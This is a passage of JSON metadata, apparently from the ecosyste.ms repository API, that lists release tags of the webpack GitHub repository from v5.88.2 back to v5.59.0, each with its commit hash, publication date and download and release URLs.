ste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2F